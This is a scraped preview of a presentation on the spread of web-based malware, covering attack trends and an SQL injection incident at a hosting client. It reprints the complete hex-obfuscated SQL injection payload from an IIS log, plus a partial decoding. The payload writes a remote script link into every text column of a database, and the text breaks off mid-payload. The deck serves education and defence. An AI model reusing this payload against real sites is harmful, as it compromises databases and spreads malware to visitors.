Web-Based Malware Menace Spreading FastMalware Behavior is ChangingInteresting TrendsAttack TechniquesAttacks Not Mentioned in PaperMore Popular Attack Techniques: SQL InjectionSQL Injection : Attack at Duo!SQL InjectionSQL Injection: Raw IIS LogSQL Injection: 1st Order AttackSQL Injection: 2nd Order AttackSQL Injection: RemediationSlide 13Slide 14Slide 15More Popular Attack Techniques: Backend Virtual Hosting CompaniesHow Malware Authors Reach UsersDrive By DownloadOther Automatic Attack MethodsOlder Detection Techniques No Longer WorkUser-Assisted Attack MethodsUser-Assisted Attack Methods (cont’d)Symantec Top Web Threats 2008New Threats for 2009 and BeyondMethods of DefenseSlide 26SQL Injection ExampleSQL Injection Example - Cont.Slide 29More Popular Attack Techniques: Search Engine Result Redirection ExampleSlide 31Web-Based Malware Menace Spreading FastGarry BennettMarcelo BergerKelley GamberaElsa MadrigalDavid PessisChuck RothFred SalchliPresented By:Malware Behavior is Changing Malware no longer exclusive to malicious sitesMalware making its way to end user machine with no user interaction requiredMalware establishing presence on end user machineThere has been explosive growth in new malicious code signaturesTable 1. New malicious code signaturesSource: Symantec CorporationInteresting Trends Malware are targeting mainstream sitesIn 2008, Economist.com and MLB.com were both hitMalware authors used DoubleClicks ad-serving softwareUnsuspecting users clicked on what looked to be legitimate ads, but were actually clicking on a Trojan which installed itself on the user’s hard drive to collect personal informationMalware authors are now looking for a bigger audienceMainstream sites provide this baseUsers who go to these sites are less likely to be concerned about being the victim of malware attackThis is an increasing problem since the notion of being safe if one visits good sites no longer holds trueWeb servers have evolved into complex codeNo longer a static pageThird-party hosted materialNetwork layer communication and exposed weaknessAttack Techniques SQL injectionMalicious advertisements Search engine result redirectionAttacks on backend virtual hosting companiesVulnerabilities in Web server or forum hosting softwareCross-site scripting (XSS) attacksAttacks Not Mentioned in PaperSniffing & Interception (HTTP vs. HTTPS)DNS Server Vulnerability ExploitsAllow malicious sites to be served Authenticity AttacksMore Popular Attack Techniques: SQL Injection Large, high-traffic sites have databases running in backgroundRead/write user interactionSecurity must extend to databases and dataHow it works:Identifies input form vulnerabilitiesHacker inserts additional SQL instructionsHacker can then navigate database and add mal contentHidden linksE.g. Trojan.Asprox7SQL Injection : Attack at Duo!Longstanding ClientClient merged with another company that had an existing e-commerce applicationWe hesitantly agreed to integrate and host the e-commerce applicationCode review and testing indicated security problemsClient pushed back on risk assessment and claimed e-commerce site would be retired in very near futureTwo years later ...78SQL InjectionFirst Order AttackAttacker gains access to the database and can perform DML and/or DDL commandsSecond Order AttackAttacker inserts data into the databaseOur attacker did bothClient called to report strange links appearing within the product pages of their site89SQL Injection: Raw IIS Log2008-04-12 17:59:39 W3SVC658304687 WEB14A POST /productcart/pc/viewCat_P.asp idCategory=57;DECLARE @S NVARCHAR(4000);SET @S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006100730070006400650072002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200 AS NVARCHAR(4000));EXEC(@S);-- 80 - 125.65.77.25 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - - www.clientname.com 200 0 0 471 2377 2562910SQL Injection: 1st Order AttackPOST /productcart/pc/viewCat_P.asp idCategory=57;DECLARE @S NVARCHAR(4000);SET @S= “DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)”AS NVARCHAR(4000));EXEC(@S);1011SQL Injection: 2nd Order AttackOPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set
View Full Document